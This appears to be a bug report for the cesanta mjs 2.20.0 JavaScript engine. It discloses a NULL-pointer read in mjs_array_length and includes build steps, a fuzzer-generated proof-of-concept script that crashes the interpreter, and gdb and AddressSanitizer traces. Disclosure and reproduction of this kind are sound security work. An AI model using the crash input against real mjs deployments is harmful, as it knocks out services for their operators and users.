Description
The name of an affected Product
mjs
The affected version
Commit: b1b6eac (Tag: 2.20.0)
Description
An issue in cesanta mjs 2.20.0 (commit b1b6eac) allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file.
Vulnerability Type
Segmentation fault (the AddressSanitizer report below shows a READ from address 0x0, i.e. a NULL-pointer dereference inside mjs_array_length)
Environment
- Operating System
Ubuntu 20.04
- Steps to Reproduce
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
PoC (save the following script as a file named `poc`; the bytes on the last `foo:` line are intentionally malformed and must be kept as-is)
let c = {
a: 7111.111, a: 7111.1111,
foo: ffi-= 62.1-11,
foo: 1.1111,
foo: ffi-= 66111, a: 7111.1111,
foo: ffi-= 62.1-11,
foo: 1.1111,
foo: ffi-= 66.1511,
foo: ffi-= 66.1511,
foo: ffi-= 1,
foo: ffi-= 111,
foo: ffi-= 66.1511,
foo: ffi('iit)�««««««o: 1.«'),
};
Run command
./mjs-asan -f poc
gdb output (this trace was captured with the PoC saved at path `../bug_2`, as frame #1 shows; note that the `mjs` argument in frame #0 differs from the valid `mjs` pointer in frame #1)
Program received signal SIGSEGV, Segmentation fault.
0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
6929 unsigned long mjs_array_length(struct mjs *mjs, mjs_val_t v) {
--Type <RET> for more, q to quit, c to continue without paging--
#0 0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
#1 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2",
src=0x612000000040 " let c = {\n a: 7111.111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66.1511,\n\tfoo: ffi-=\t66.1511,\n\t \nfoo: ffi-=\t\t\t\t"..., generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#2 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", res=0x7fffffffdb80) at mjs.c:9067
#3 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406
AddressSanitizer output
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1337947==The signal is caused by a READ memory access.
==1337947==Hint: address points to the zero page.
#0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929
#1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
#2 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
#3 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
#4 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
#5 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length
==1337947==ABORTING